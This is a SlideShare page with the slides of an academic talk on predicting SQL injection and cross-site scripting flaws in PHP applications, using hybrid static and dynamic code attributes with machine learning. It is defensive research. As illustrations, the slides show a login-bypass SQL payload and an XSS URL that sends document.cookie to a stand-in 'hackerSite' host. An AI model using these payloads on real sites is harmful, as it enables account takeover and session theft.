SlideShare uma empresa Scribd logo
1 de 24
Baixar para ler offline
Mining SQL Injection and
Cross Site Scripting
Vulnerabilities using
Hybrid Program Analysis
Shar Lwin Khin,
Tan Hee Beng Kuan
Information Engineering,
Nanyang Technological University,
Singapore
	
  
Lionel Briand,
Interdisciplinary Centre for ICT Security,
Reliability, and Trust,
University of Luxembourg,
Luxembourg
	
  
shar0035@e.ntu.edu.sg	
  
ibktan@e.ntu.edu.sg	
  	
  
lionel.briand@uni.lu	
  	
  
Mo7va7on
 	
  Increasing	
  number	
  of	
  vulnerabili7es	
  
 Developers	
  lack	
  security	
  awareness	
  
 Manual	
  vulnerability	
  audit	
  is	
  effort	
  intensive	
  
Related	
  Work
Method	
   Granularity	
   Accuracy	
   Scalability	
  
Vuln.	
  Predic7on	
  
×	
   √	
   √	
  
Sta7c	
  taint	
  analysis	
  
√	
  	
   ×	
   √	
  
Sta7c	
  &	
  dynamic	
  analysis	
  
√	
   √	
   ×	
  
	
  ???	
  
√	
   √	
   √	
  
Problem	
  Defini7on 	
  1/2
 Input	
  valida,on	
  and	
  sani,za,on	
  are	
  two	
  common	
  
defense	
  methods	
  used	
  in	
  web	
  applica7ons	
  
 Sta,c	
  a2ributes	
  have	
  been	
  shown	
  to	
  be	
  indicators	
  of	
  
vulnerabili7es,	
  though	
  not	
  accurate	
  enough	
  
 Can	
  we	
  use	
  Sta7c	
  and	
  dynamic	
  aPributes	
  together	
  
characterizing	
  the	
  implementa7ons	
  of	
  these	
  defense	
  
methods	
  as	
  indicators?	
  
 Machine	
  learning	
  to	
  predict	
  vulnerability	
  based	
  on	
  
aPributes	
  
Problem	
  Defini7on 	
  2/2
 Typical	
  predic7on	
  models	
  are	
  classifica7on-­‐based	
  
 Being	
  supervised	
  learning,	
  their	
  effec7veness	
  is	
  
dependent	
  on	
  the	
  availability	
  of	
  sufficient	
  training	
  data	
  
tagged	
  with	
  class	
  labels	
  
 Cluster	
  analysis	
  	
  (CA)	
  is	
  a	
  type	
  of	
  unsupervised	
  learning	
  
methods	
  
 CA	
  may	
  be	
  used	
  if	
  vulnerable	
  instances	
  can	
  be	
  
dis7nguished	
  from	
  non-­‐vulnerable	
  instances	
  based	
  on	
  
the	
  proposed	
  aPributes	
  
Vulnerability	
  Distribu7ons	
  
© Web Hacking Incident Database
SQL	
  Injec7on	
  	
  
7
Hacker
login.php
Database
$name = ’ or 1=1 --
$q = “select * from user where
name=‘’ or 1=1--’ and pw=‘’
 Cause:	
  Inadequate	
  valida7on	
  and	
  sani7za7on	
  
of	
  user	
  inputs	
  used	
  in	
  queries	
  
$q = “select * from user where
name=‘”.$name.“’ and pw=‘”.$pw.“’”
Unauthorized user information
SQLI!
Cross	
  Site	
  Scrip7ng	
  
 Cause:	
  No	
  sanity	
  check	
  of	
  input	
  before	
  used	
  
in	
  HTML	
  documents	
  
Hacker Victim travelerTip.php
Inject Script: <script>alert(xss!);</script>
Visit
http://travelingForum/travelerTip.php?
Action=Post&Place=Greece&Tip=<Script>document.location=‘http://hackerSite/
stealCookie.jsp?cookie=’+document.cookie; </Script>
Injected Script executed on
victim’s browser
XSS!
Vulnerability	
  Predic7on	
  Principles	
  	
  1/2	
  
 Using	
  hybrid	
  code	
  a2ributes	
  to	
  predict	
  vulnerabili7es	
  
 Based	
  on	
  both	
  sta7c	
  and	
  dynamic	
  program	
  analyses	
  
 Input	
  valida7on	
  checks	
  and	
  sani7za7on	
  opera7ons	
  mainly	
  
based	
  on	
  string	
  opera,ons	
  	
  
 e.g.,	
  preg_replace(“<script”, “”, $data)	
  	
  
 Classify	
  the	
  types	
  of	
  string	
  opera7ons	
  applied	
  according	
  
to	
  their	
  poten,al	
  effects	
  on	
  the	
  inputs	
  before	
  their	
  use	
  in	
  
security-­‐sensi7ve	
  statements—sinks	
  	
  
 e.g.,	
  echo $data; mysql_query($data)	
  
 Such	
  valida7on	
  checks	
  and	
  opera7ons	
  can	
  be	
  iden7fied	
  
by	
  analyzing	
  data	
  dependence	
  graphs	
  
Vulnerability	
  Predic7on	
  Principles	
  	
  2/2	
  
 Given	
  the	
  data	
  dependence	
  graph	
  of	
  a	
  sink:	
  	
  
extrac,ng	
  the	
  number	
  of	
  inputs,	
  and	
  the	
  numbers	
  and	
  
types	
  of	
  valida,on	
  and	
  sani,za,on	
  func,ons	
  from	
  the	
  
graph,	
  can	
  we	
  predict	
  the	
  sink’s	
  vulnerability?	
  
	
  
	
  
	
  
 E.g.,	
  if	
  a	
  sink	
  uses	
  five	
  different	
  inputs,	
  there	
  
should	
  at	
  least	
  be	
  five	
  input	
  valida7on	
  or	
  
sani7za7on	
  func7ons.	
  
sink
Sta7c	
  and	
  Dynamic	
  Classifica7on	
  
 From	
  the	
  language	
  built-­‐in	
  func7ons	
  that	
  have	
  specific	
  
security	
  purposes,	
  the	
  language	
  operators,	
  and	
  the	
  
predefined	
  language	
  parameters	
  used,	
  a	
  node	
  is	
  classified	
  
sta,cally.	
  
 e.g.,	
  addslashes($input), $_GET, $a = $b . $c
 But	
  it	
  is	
  classified	
  dynamically	
  if	
  the	
  node	
  invokes	
  user-­‐
defined	
  func7ons	
  or	
  some	
  built-­‐in	
  func7ons	
  such	
  as	
  string	
  
replacement.	
  
 e.g.,	
  $sanitized = preg_replace(“<+”, “”, $input)
 The	
  func7on	
  code	
  is	
  executed	
  using	
  a	
  set	
  of	
  predefined	
  test	
  
inputs,	
  and	
  the	
  final	
  values	
  of	
  test	
  input	
  variables	
  are	
  
searched	
  for	
  malicious	
  characters.	
  
Hybrid	
  Code	
  APributes	
  
Attribute
ID
Attribute Name Description
Static attributes
1 Client The number of nodes that access data from HTTP request parameters
2 File The number of nodes that access data from files
3 Database The number of nodes that access data from database
4 Text-database Boolean value ‘TRUE’ if there is any text-based data accessed from database; ‘FALSE’ otherwise
5 Other-database Boolean value ‘TRUE’ if there is any data except text-based data accessed from database; ‘FALSE’
otherwise
6 Session The number of nodes that access data from persistent data objects
7 Uninit The number of nodes that reference un-initialized program variable
8 SQLI-sanitization The number of nodes that apply standard sanitization functions for preventing SQLI issues
9 XSS-sanitization The number of nodes that apply standard sanitization functions for preventing XSS issues
10 Numeric-casting The number of nodes that type-cast data into a numeric type data
11 Numeric-type-check The number of nodes that perform numeric data type check
12 Encoding The number of nodes that encode data into a certain format
13 Un-taint The number of nodes that return predefined information or information not influenced by external
users
14 Boolean The number of nodes which invoke functions that return Boolean value
15 Propagate The number of nodes that propagate partial or complete value of an input
Dynamic attributes
16 Numeric The number of nodes which invoke functions that return only numeric, mathematic, or dash characters
17 LimitLength The number of nodes that invoke string-length limiting functions
18 URL The number of nodes that invoke path-filtering functions
19 EventHandler The number of nodes that invoke event-handler filtering functions
20 HTMLTag The number of nodes that invoke HTML-tag filtering functions
21 Delimiter The number of nodes that invoke delimiter filtering functions
22 AlternateEncode The number of nodes that invoke alternate-character-encoding filtering functions
Target attribute
23 Vulnerable? Indicates a class label—Vulnerable or Not-Vulnerable
Sample	
  APribute	
  Vectors	
  
•  Each	
  sink	
  would	
  be	
  represented	
  by	
  a	
  23-­‐
dimensional	
  aPribute	
  vector.	
  
	
  
•  Sample	
  aPribute	
  vectors	
  (Session,	
  XSS-­‐sanit,	
  
Un-­‐taint,	
  Delimiter,	
  Propagate,…,	
  
Vulnerable?):	
  	
  
 (2,	
  4,	
  0,	
  0,	
  2,…,	
  Not-­‐Vulnerable)	
  
 (1,	
  0,	
  1,	
  1,	
  7,…,	
  Vulnerable)	
  	
  
13/50
Supervised	
  Vulnerability	
  Predic7on	
  
 Data	
  Preprocessing	
  
 Normaliza7on	
  
 Principal	
  Component	
  Analysis	
  
 Classifiers	
  
 Logis7c	
  Regression	
  –regression	
  analysis	
  
 Mul7-­‐Layer	
  Perceptron	
  –neural	
  network	
  analysis	
  
 Training	
  &	
  Tes7ng	
  –10-­‐fold	
  cross	
  valida7on	
  
	
  
Unsupervised	
  Vulnerability	
  Predic7on	
  
 Use	
  same	
  data	
  preprocessing	
  ac7vi7es	
  as	
  
supervised	
  models	
  
 K-­‐means	
  cluster	
  analysis	
  based	
  on	
  two	
  
assump7ons	
  
 non-­‐vulnerable	
  sinks	
  are	
  much	
  more	
  frequent	
  than	
  
vulnerable	
  sinks	
  
 vulnerable	
  sinks	
  have	
  different	
  characteris7cs	
  from	
  
non-­‐vulnerable	
  sinks	
  
 Label	
  clusters	
  as	
  Vulnerable	
  or	
  Non-­‐Vulnerable:	
  
 K=4:	
  Maximum	
  number	
  of	
  clusters	
  
 %Normal=12:	
  Minimum	
  size	
  of	
  non-­‐vulnerable	
  
cluster	
  
Case	
  Study	
  
 Six	
  open	
  source,	
  web	
  applica7ons	
  (PHP):	
  	
  
 Known	
  vulnerable	
  
 Func7onali7es:	
  school	
  admin,	
  forum,	
  news,	
  
content,	
  database	
  management	
  
 Sizes:	
  from	
  2k	
  –	
  44k	
  LOC	
  
	
  
 Vulnerability	
  iden7fica7on:	
  manual	
  &	
  vuln.	
  
databases	
  –	
  Bugtraq,	
  CVE	
  
16
Prototype	
  Tool	
  	
  
Architecture of
PhpMiner
Weka
Experiment	
  &	
  Result 	
   	
  1/2	
  
Classification results of predictors built from hybrid attributes.
LR performs better than MLP
Maximum analysis time: 2 hours, average ½ hour
AccuracyShin et al. TSE’113 achieved recall>80 and pf<25
Pixy S&P’061 reported pf>20.
Too many false positives!
Ardilla ICSE’094 reported up to 50% of paths left
unexplored.... False negatives?
 Our result recall=90, pf=5
Measure (%) à
Data & Classifier
recall false alarm precision
schmate-html LR 99 3 98
MLP 99 0 100
faqforge-html LR 89 5 94
MLP 91 5 94
utopia-html LR 94 1 94
MLP 94 2 89
phorum-html LR 78 1 70
MLP 33 0 100
cutesite-html LR 68 9 61
MLP 78 8 67
myadmin-html LR 85 1 89
MLP 75 1 83
Average results on XSS prediction LR 86 3 84
MLP 78 3 89
schmate-sql LR 97 8 98
MLP 96 35 92
faqforge-sql LR 88 4 94
MLP 88 4 94
phorum-sql LR 100 3 63
MLP 0 1 0
cutesite-sql LR 91 14 89
MLP 89 18 86
Average results on SQLI prediction LR 94 7 86
MLP 68 15 68
Overall average LR 90 5 85
MLP 74 8 81
Experiment	
  &	
  Result 	
   	
  2/2	
  
Measure (%)
Data recall false alarm precision
utopia-html 100 13 65
phorum-html 56 11 16
cutesite-html 70 20 41
myadmin-html 55 8 33
phorum-sql 100 7 38
Average 76 12 39
k-means clustering analysis results on the datasets which have < 40% vulnerable sinks
Measure (%)
Data recall false alarm precision
schmate-html 9 0 100
faqforge-html 26 0 100
schmate-sql 3 32 29
faqforge-sql 0 0 undefined
cutesite-sql 0 0 undefined
Average 8 6 undefined
k-means clustering analysis results on the datasets which have ≥ 40% vulnerable sinks
 When assumptions are not met, clustering does not work!
Limita7ons	
  
 Supervised	
  learning	
  requires	
  sufficient	
  labeled	
  
data	
  for	
  training	
  
 Unsupervised	
  learning	
  relies	
  on	
  some	
  
assump7ons,	
  which	
  are	
  not	
  always	
  true:	
  
Applicable	
  for	
  most	
  commercial	
  systems?	
  
 For	
  unsupervised	
  learning,	
  tuning	
  the	
  parameters	
  
is	
  required:	
  
 	
  K:	
  Maximum	
  number	
  of	
  clusters	
  
 	
  %Normal:	
  Minimum	
  size	
  of	
  non-­‐vulnerable	
  cluster	
  
	
  
Conclusion	
  
 Security	
  audi7ng	
  by	
  providing	
  probabilis7c	
  alerts	
  about	
  
vulnerable	
  code	
  statements.	
  	
  
 Propose	
  hybrid	
  (sta7c	
  and	
  Dynamic)	
  code	
  aPributes	
  
for	
  vulnerability	
  predic,on	
  using	
  machine	
  learning	
  
 APributes	
  characterize	
  common	
  input	
  valida7on	
  and	
  
sani7za7on	
  code	
  paPerns,	
  without	
  expensive	
  analysis	
  
 Scalability:	
  <	
  2	
  hours	
  on	
  a	
  regular	
  PC	
  
 Both	
  supervised	
  learning	
  and	
  unsupervised	
  learning	
  
methods	
  were	
  used	
  	
  
 Supervised	
  learning	
  accuracy:	
  90%	
  R,	
  85%	
  P	
  
 Unsupervised	
  learning:	
  Lower	
  accuracy,	
  applicability?	
  
Future	
  Work	
  
 Semi-­‐supervised	
  learning	
  
	
  
 Combining	
  data	
  dependency	
  informa7on	
  with	
  
control	
  dependency	
  informa7on	
  
	
  
 Address	
  other	
  types	
  of	
  similar	
  vulnerabili7es	
  
by	
  considering	
  other	
  types	
  of	
  code	
  paPerns	
  
The	
  End!	
  
hPp://sharlwinkhin.com	
  
23/50
Thank You!
Question?
References	
  
1.  N.	
  Jovanovic,	
  C.	
  Kruegel,	
  and	
  E.	
  Kirda,	
  “Pixy:	
  a	
  sta7c	
  analysis	
  tool	
  for	
  
detec7ng	
  web	
  applica7on	
  vulnerabili7es,”	
  in	
  IEEE	
  Symposium	
  on	
  
Security	
  and	
  Privacy,	
  2006,	
  pp.	
  258-­‐263.	
  
2.  D.	
  Balzarou	
  et	
  al.,	
  “Saner:	
  composing	
  sta7c	
  and	
  dynamic	
  analysis	
  to	
  
validate	
  sani7za7on	
  in	
  web	
  applica7ons,”	
  in	
  IEEE	
  Symposium	
  on	
  Security	
  
and	
  Privacy,	
  2008,	
  pp.	
  387-­‐401.	
  	
  
3.  Y.	
  Shin,	
  A.	
  Meneely,	
  L.	
  Williams,	
  and	
  J.	
  A.	
  Osborne,	
  “Evalua7ng	
  
complexity,	
  code	
  churn,	
  and	
  developer	
  ac7vity	
  metrics	
  as	
  indicators	
  of	
  
sowware	
  vulnerabili7es,”	
  IEEE	
  Transac7ons	
  on	
  Sowware	
  Engineering,	
  vol.	
  
37	
  (6),	
  pp.	
  772-­‐787,	
  2011.	
  
4.  Kieżun,	
  A.,	
  Guo,	
  P.	
  J.,	
  Jayaraman,	
  K.,	
  and	
  Ernst,	
  M.	
  D.	
  2009.	
  Automa7c	
  
crea7on	
  of	
  SQL	
  injec7on	
  and	
  cross-­‐site	
  scrip7ng	
  aPacks.	
  In	
  Proceedings	
  
of	
  the	
  31st	
  Interna,onal	
  Conference	
  on	
  SoTware	
  Engineering,	
  
Vancouver,	
  BC,	
  pp.	
  199-­‐209.	
  	
  
5.  RSnake.	
  hPp://ha.ckers.org,	
  accessed	
  March	
  2012.	
  
6.  I.	
  H.	
  WiPen	
  and	
  E.	
  Frank,	
  Data	
  Mining,	
  2nd	
  ed.,	
  Morgan	
  Kaufmann,	
  2005.	
  
	
  
24

Mais conteúdo relacionado

Mais procurados

Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...Gui Padua
 
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Swati Patel
 
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioAnalysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioPVS-Studio
 
Fraud detection system
Fraud detection systemFraud detection system
Fraud detection systembaladutt
 
CIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCloudIDSummit
 
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationDRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationSebastiano Panichella
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code reviewSantosh Gulivindala
 
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...Akram El-Korashy
 

Mais procurados (9)

Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...IEEE ACM Studying the Relationship between Exception Handling Practices and P...
IEEE ACM Studying the Relationship between Exception Handling Practices and P...
 
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey Software Birthmark for Theft Detection of JavaScript Programs: A Survey
Software Birthmark for Theft Detection of JavaScript Programs: A Survey
 
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-StudioAnalysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
Analysis of PascalABC.NET using SonarQube plugins: SonarC# and PVS-Studio
 
Fraud detection system
Fraud detection systemFraud detection system
Fraud detection system
 
CIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC ConnectCIS14: Developing with OAuth and OIDC Connect
CIS14: Developing with OAuth and OIDC Connect
 
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs DocumentationDRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
DRONE: A Tool to Detect and Repair Directive Defects in Java APIs Documentation
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code review
 
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
SecurePtrs: Proving Secure Compilation with Data-Flow Back-Translation and Tu...
 

Semelhante a Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis

DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Priyanka Aash
 
Ebu class edgescan-2017
Ebu class edgescan-2017Ebu class edgescan-2017
Ebu class edgescan-2017Eoin Keary
 
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...GeeksLab Odessa
 
Application Security
Application SecurityApplication Security
Application Securityflorinc
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdftsaaroacademy
 
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyDEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyFelipe Prado
 
Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security LLC
 
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...Stefano Dalla Palma
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Chetan Khatri
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Sonatype
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecuritySplunk
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecurityShannon Cuthbertson
 

Semelhante a Mining SQLi and XSS Vulnerabilities Using Hybrid Analysis (20)

DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud ...
 
Ebu class edgescan-2017
Ebu class edgescan-2017Ebu class edgescan-2017
Ebu class edgescan-2017
 
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
QA Lab: тестирование ПО. Станислав Шмидт: "Self-testing REST APIs with API Fi...
 
Application Security
Application SecurityApplication Security
Application Security
 
What are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdfWhat are the best tools used in cybersecurity in 2023.pdf
What are the best tools used in cybersecurity in 2023.pdf
 
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxyDEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
DEF CON 27 - AMIT WAISEL and HILA COHEN - malproxy
 
Code securely
Code securelyCode securely
Code securely
 
Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠Integris Security - Hacking With Glue ℠
Integris Security - Hacking With Glue ℠
 
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
VCCFinder: Finding Potential Vulnerabilities in Open-Source Projects to Assis...
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
Snippets, Scans and Snap Decisions: How Component Identification Methods Impa...
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 

Mais de Lionel Briand

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLionel Briand
 
Metamorphic Testing for Web System Security
Metamorphic Testing for Web System SecurityMetamorphic Testing for Web System Security
Metamorphic Testing for Web System SecurityLionel Briand
 
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...
Simulator-based Explanation and Debugging of Hazard-triggering Events in DNN-...Lionel Briand
 
Fuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation TestingFuzzing for CPS Mutation Testing
Fuzzing for CPS Mutation TestingLionel Briand
 
Data-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical SystemsData-driven Mutation Analysis for Cyber-Physical Systems
Data-driven Mutation Analysis for Cyber-Physical SystemsLionel Briand
 
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled SystemsMany-Objective Reinforcement Learning for Online Testing of DNN-Enabled Systems
Many-Objective Reinforcement Learning for Online Testing of DNN-Enabled SystemsLionel Briand
 
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...
ATM: Black-box Test Case Minimization based on Test Code Similarity and Evolu...Lionel Briand
 
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...
Black-box Safety Analysis and Retraining of DNNs based on Feature Extraction ...Lionel Briand
 
PRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System LogsPRINS: Scalable Model Inference for Component-based System Logs
PRINS: Scalable Model Inference for Component-based System LogsLionel Briand
 
Revisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software TestingRevisiting the Notion of Diversity in Software Testing
Revisiting the Notion of Diversity in Software TestingLionel Briand
 
Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...Applications of Search-based Software Testing to Trustworthy Artificial Intel...
Applications of Search-based Software Testing to Trustworthy Artificial Intel...Lionel Briand
 
Autonomous Systems: How to Address the Dilemma between Autonomy and Safety
Autonomous Systems: How to Address the Dilemma between Autonomy and SafetyAutonomous Systems: How to Address the Dilemma between Autonomy and Safety
Autonomous Systems: How to Address the Dilemma between Autonomy and SafetyLionel Briand
 
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...
Mathematicians, Social Scientists, or Engineers? The Split Minds of Software ...Lionel Briand
 
